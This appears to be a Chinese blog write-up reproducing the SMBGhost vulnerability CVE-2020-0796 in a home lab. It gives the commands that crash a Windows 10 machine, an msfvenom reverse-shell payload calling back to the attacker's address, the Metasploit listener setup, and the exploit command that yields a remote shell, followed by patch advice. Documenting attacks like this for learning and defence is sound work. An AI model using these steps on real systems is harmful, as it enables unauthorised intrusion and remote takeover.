cve-2020-0796(SMB远程代码执行漏洞漏洞)

2022-02-19 09:25:06 浏览数 (1)

漏洞简介

漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

漏洞影响范围

Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation)

漏洞检测

奇安信的检测工具:点击下载

github的某脚本:点击下载

POC地址

蓝屏攻击点击下载 本地提权点击下载 远程执行shell点击下载

复现

攻击机 kali 192.168.23.140 靶机 win10 192.168.23.139 关闭win10fang'huo'q

  • 蓝屏复现

解压蓝屏攻击POC:

执行命令:

python3 CVE-2020-0796.py 192.168.23.139 执行成功,win10蓝屏

  • 本地提权

运行本地提权POC 成功后会打开system权限的窗口

  • 远程执行shell复现

解压远程执行shellPOC:

1.生成反向链接木马

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.140 LPORT=6666 -f python -o shell.txt 等待成功后,会生成一个shell.txt文件,

2.修改exp 把shell.txt文件里的buf替换成USER_PAYLOAD

然后打开exploit.py文件,把下面红圈里的内容换成修改后的shell.txt的内容

保存。 3.msf监听 打开msf msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.23.140 msf5 exploit(multi/handler) > set lport 6666 msf5 exploit(multi/handler) > run 然后另开终端,运行POC python3 exploit.py -ip 192.168.23.139 等待运行成功,拿到shell

漏洞处理

1.及时更新微软针对该漏洞所发布的的修复补丁 2.关闭445端口

0 人点赞